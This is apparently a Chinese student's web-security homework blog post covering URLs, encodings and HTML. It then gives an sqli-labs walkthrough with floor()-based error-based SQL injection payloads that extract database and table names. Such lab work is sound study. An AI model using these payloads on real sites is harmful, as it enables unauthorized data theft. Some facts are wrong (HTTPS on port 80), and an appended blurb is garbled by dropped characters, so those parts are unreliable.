网安第一次作业

web入侵和渗透

官网 cnvd

漏洞类型
通用型漏洞
事件型漏洞

26中漏洞
登录成功的数字4624 审核成功
审核失败4625

url

用的协议为https
主机:域名或者ip
端口默认为80
路径 访问的路径
查询参数:类似于mysql中的查询 select

编码历史:
ascll
unicode(不可变)
utf-8(可变长)掌握utf-8的编码转码规则
先选择范围,然后根据规则将其补全

HTML超文本标记语言
构成 Web 世界的一砖一瓦。它定义了网页内容的含义和结构。除 HTML 以外的其它技术则通常用来描述一个网页的表现与展示效果(如 CSS),或功能与行为(如 JavaScript)。

HTML实例解析
这个 <p 元素定义了 HTML 文档中的一个段落。
这个元素拥有一个开始标签 p> 以及一个结束标签 /p

body 元素定义了 HTML 文档的主体。
这个元素拥有一个开始标签 body 以及一个结束标签 /body。

HTML 链接由 a标签定义

class 为html元素定义一个或多个类名(classname)(类名从样式文件引入)

id 定义元素的唯一id

h1 定义最大的标题。 h6 定义最小的标题

<b 定义粗体文本
<em 定义着重文字
<i 定义斜体字
<small 定义小号字
<strong 定义加重语气
<sub 定义下标字
<sup 定义上标字
<ins 定义插入字
<del 定义删除字

不过多介绍了

正则表达式(https://www.runoob.com/regexp/regexp-tutorial.html)

练习sql-map-master的1-7关

第一关
在这里插入图片描述
用id=1 and 1=1 判断是什么类型
在这里插入图片描述
发现第一关的闭合是与单引号有关。

第二关同理(只是与双引号有关)
在这里插入图片描述

第三关(与‘)有关)
在这里插入图片描述
第四关(与“)有关)在这里插入图片描述
第五关,和前面一样判断,发现他不为所动
在这里插入图片描述
但是通过 语句 我们发现正常闭合且显示正确,说明是单引号的注入漏洞
在这里插入图片描述

我们通过输入order by 等语句还是能看到明显的回显

因为没有数据显示 那么我们就不能用联合查询进行报错

所以我们这里采用报错注入

报错注入

报错注入的方法有多种 我们这里采用 floor报错

格式如下:

and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)

再者其中 payload就是你要搜索的语句
而对于本题 我们输入的内容如下:

?id=1’ and (select 1 from (select count(*),concat((SELECT schema_name FROM information_schema.schemata limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

这里通过limit值 我们可以一条 一条的搜索 数据库的名称

在这里插入图片描述

同理 我们可以通过相同的方法来进行数据库表的查询

输入如下:

?id=1’ and (select 1 from (select count(*),concat((SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=“ctftraining” limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

其余同理即可

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
GitHub是一个基于Web的代码托管平台,它提供了版本控制和协作功能,让开发者可以方便地共享和管理代码。在GitHub上,有很多与相关的项目,这些项目致力于保护全、防止黑客攻击和提高系统的全性。以下是一些常见的GitHub项目: 1. OWASP(开放式Web应用程序全项目):OWASP是一个致力于提高Web应用程序全性的国际组织。他们在GitHub上维护了一系列开源项目,包括全工具、漏洞测试和全指南等。 2. Metasploit:Metasploit是一个广泛使用的渗透测试框架,它提供了一系列工具和资源,帮助全专家评估和增强系统的全性。Metasploit在GitHub上有一个官方仓库,开发者可以在这里获取最新的代码和贡献自己的改进。 3. Snort:Snort是一个开源的入侵检测系统(IDS),它可以监测络流量并检测潜在的攻击行为。Snort的代码托管在GitHub上,开发者可以参与到项目中,改进和定制自己的IDS规则。 4. Nmap:Nmap是一个络扫描和主机发现工具,它可以帮助全专家评估络的全性。Nmap的源代码也在GitHub上开放,用户可以自由地访问和贡献代码。 5. Security Shepherd:Security Shepherd是一个教育性的Web应用程序,旨在帮助开发者学习和理解常见的Web全漏洞。它提供了一系列的挑战和实验,供用户测试和提高自己的全技能。Security Shepherd的代码也在GitHub上开源。 这些项目只是GitHub上众多项目的一小部分,你可以通过在GitHub上搜索关键词来找到更多与相关的项目。希望这些信息对你有帮助!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值